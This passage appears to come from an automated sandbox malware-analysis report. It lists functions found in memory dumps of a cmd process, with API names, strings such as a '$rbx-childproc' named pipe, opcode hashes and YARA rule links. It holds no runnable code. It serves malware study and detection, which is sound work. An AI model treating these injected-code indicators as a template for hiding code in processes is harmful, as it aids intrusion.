                                            • Instruction ID: 90ad3b12243eee247cba00e652f4e58dcc18f06929423b152f25bd164d4690bd
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: DB318431E58F4986EB12DF12AC48B5963A1B7C4FE6F5460259E4A43B24DF38C662C704
                                            Function 00000253FC40A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: 6bb59e44c9d766cacd25500a4641c18bee733b2f62571fe0a20bd516089998f1
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: B5D1AE33AC8F888AEB22DF25984839D77A0F7557D9F102105EE8957FA6CB34C6A0C714
                                            Function 00000253FC43A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: a9fff25546c49c59133e46dfa5fa2e7d50e84f8f791943e9828ea064767a90d1
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: AED1F732A88F888AEB22CF64D84839D37A0F7957D9F902125DE8957F95CF34C6A0D714
                                            Function 00000253FC3D962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: 29742a37f3cb22368057c1edb687a6361cd9af573a448ec6265bb64c9951c13d
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: C0D1A032A48B8C86EB60DFA5D89839D37A0F7457C9F102106EE8957F9ADF38D284C745
                                            Function 00000253FC40104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 95b4fd4e5003cea539c040b0b63fb9c2aa0c7dba7a559bb9d3cd1e6968ecfa17
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: B2419233A98F84CAE765CF21E84839A77A1F388BD9F449115DA890BB68DF38C555CB04
                                            Function 00000253FC43104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 7bebb09c3b132bb2f8ec014379196882a1a6f7d7f17972ea3512d14deeaaed2b
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: 5541AE33A18F84CAEB61CF21E84879A77B1F388BD9F448129DA8907B58DF38C555CB00
                                            Function 00000253FC402518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 2540d9f0e9f31276f3620984e8d2fcb6602a9160ee307012fb522512b7d9c756
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: B6115435A58B4487E712CB61F8183597770F385BD5F545315EAAA02FA8CF3CC254CB44
                                            Function 00000253FC432518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: 77fa7374bcdd04de2ea454ff39b265cc43cfe78872bb27dea8a4f135d5c86e08
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: DF114F36A58B4482EB11CB21F8187597770F389BD6F945315EE6A02EA8CF7CC254CB44
                                            Function 00000253FC407C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 2e7c5ea62cd1e184ceb7e58ff96abfff096eee5547f5ac4a323284591541bb2d
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 2681C130ECCE4C86FA53EB669C493A967D0AB857C2F4460149A4847FB7DA38CB65C70D
                                            Function 00000253FC437C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 4fb6207c609dc84d8d229e04ac08496c680218a4a3873b4fd8879841578740b6
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 79811530E8CE0C46FA53DB659D493A962D0ABC17C2F946035A98847F93DA38CB25E70C
                                            Function 00000253FC3D7050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000003.2868987074.00000253FC3D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000253FC3D0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_3_253fc3d0000_cmd.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 77ff569980bfc6b4095d82264567d17c2bb0ce2b3689649e88338a8d3cf32a12
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 98810330E8CE4D46FB50DBE59C6D3992290AB877C2F447117A90843F9EDA3CEB468748
                                            Function 00000253FC409AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409B31
                                            • GetLastError.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409B69
                                            • FreeLibrary.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409BD7
                                            • GetProcAddress.KERNEL32(?,?,?,00000253FC409C6B,?,?,?,00000253FC40945C,?,?,?,?,00000253FC408F65), ref: 00000253FC409BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: d1256c37387bbf3815cfec0a27ec9f998007e3dcbda0f18378901d15e44a7228
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: FE31C631AEAE4891EE13DB02AC0879527B4B754BF1F591524DD5D87BA4DF38C664C308
                                            Function 00000253FC439AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439B31
                                            • GetLastError.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439B69
                                            • FreeLibrary.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439BD7
                                            • GetProcAddress.KERNEL32(?,?,?,00000253FC439C6B,?,?,?,00000253FC43945C,?,?,?,?,00000253FC438F65), ref: 00000253FC439BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: 207d4456724d15fcea771c1ae6519a87b208a85a76092049263219fa252733b0
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 2831C731B6AE48D1EE13DB06AC0879527A4B794BE2F991634DD1D87B90DF38C664D308
                                            Function 00000253FC413400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 6801c72a2d9492a0e53ba480ea3a597c2e61822782d8af28fa006b707b5c77d7
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 40118E31A58E4486E753CB53EC5975966B0F388BE6F401214EAAE87FA4CF38C6248748
                                            Function 00000253FC443400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 3927d23acae12af36557d29a73a1ed802fdb1fba5f6867fd6b227c365fe9ab07
                                            • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction Fuzzy Hash: 9F118135A58E4482E752CB52EC58B5976B0F388FE6F501214EE5E87F94CF38CA248748
                                            Function 00000253FC406270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 2060af764a2a8beb54b54e8ca313e98812e2bc3769497323ea9f86981d42ef8a
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 89D18C76688F8C81DA71DB0AE89539A7BA0F388BC5F101116EE8D47BB5DF39C651CB04
                                            Function 00000253FC436270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction ID: 29287f9906854fe0bbadf7d9b39e07c6c366fe21028929edd2b29af620eb47ff
                                            • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                            • Instruction Fuzzy Hash: 4CD1AD36A48F4881EA71DB06E89435A77A0F3C8BC5F501126EACD47BA5DF39C651DB08
                                            Function 00000253FC402098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3394547651.00000253FC401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC400000, based on PE: true
                                            • Associated: 00000011.00000002.3393249918.00000253FC400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3395490678.00000253FC415000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3396316752.00000253FC420000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397038505.00000253FC422000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3397816810.00000253FC429000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc400000_cmd.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: bbe35f6a3d5327017e726759b646d2b6fcbb5430ff6e0c23e27200ec1e9b986e
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: 7E51F534AC9F4985EA17EB25EC5929423A1FB047C6F802815A56C46BB5EF34CB38C748
                                            Function 00000253FC432098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000011.00000002.3399458074.00000253FC431000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000253FC430000, based on PE: true
                                            • Associated: 00000011.00000002.3398640238.00000253FC430000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3400412386.00000253FC445000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3401256506.00000253FC450000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402011805.00000253FC452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000011.00000002.3402873149.00000253FC459000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_17_2_253fc430000_cmd.jbxd
                                            Similarity
                                            • API ID: Free$CurrentThread
                                            • String ID:
                                            • API String ID: 564911740-0
                                            • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction ID: 56772f9ca36d01151f8fb94c8f980b79a9c766d60bea2f6084df847a96cd4abe
                                            • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                            • Instruction Fuzzy Hash: DB51E830A89F4995EF17DB14EC5929433A1BB847C6FC02825A52C06BAAEF74C734E748
